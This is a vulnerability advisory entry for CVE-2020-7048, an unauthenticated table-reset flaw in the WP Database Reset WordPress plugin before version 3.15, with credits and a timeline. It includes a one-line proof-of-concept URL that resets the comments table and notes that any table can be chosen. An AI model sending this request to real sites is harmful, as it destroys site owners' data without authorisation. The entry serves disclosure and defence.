WP Database Reset < 3.15 - Unauthenticated Database Reset
Description
This flaw "allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state."
Proof of Concept
URL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111

The db-reset-tables%5B%5D parameter (URL-encoded db-reset-tables[]) can be set to any database table you want to reset; the request requires no authentication.

Affects Plugin

WP Database Reset, fixed in version 3.15

References

CVE CVE-2020-7048
URL https://www.wordfence.com/blog/2020/01/easily-exploitable-vulnerabilities-patched-in-wp-database-reset-plugin/

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Verified No
WPVDB ID 10027

Timeline

Publicly Published 2020-01-16
Added 2020-01-16
Last Updated 2020-01-17